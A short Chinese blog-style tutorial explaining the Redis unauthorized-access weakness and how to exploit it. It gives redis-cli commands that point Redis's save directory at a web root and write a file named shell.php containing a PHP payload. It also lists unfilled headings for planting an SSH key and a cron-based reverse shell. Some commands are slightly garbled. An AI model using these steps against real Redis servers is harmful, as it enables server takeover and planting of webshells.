Redis未授权访问
Redis未授权访问漏洞原理
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用一定的策略(如防火墙), Redis会被 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 来进行攻击操作
2.2写入webshell
前提条件:
1.靶机redis链接未授权,在攻击机上能用redis-cli连上,如上图,并未登陆验证
2.开了web服务器,并且知道路径(如利用phpinfo,或者错误爆路经),还需要具有文件读写增删改查权限
操作:
1在redis的src目录下执行命令
1 | ./redis -cli -h 目标ip:6379 |
2把shell写入web路径下,假设web路径为/home/www,首先设置redis保存的路径
1 | config set dir /home/www #设置redis保存的路径 |
3.设置保存时的文件名。
1 | config set dbfilename shell.php #设置保存时的文件名 |
4.写入webshell
1 | set webshell “”\r\n\r\nphpinfo(); \r\n\r\n"" |
2.3写入一个ssh私钥进行连接
2.4写入文件(反弹shell)到计划任务目录下执行
评论系统未开启,无法评论!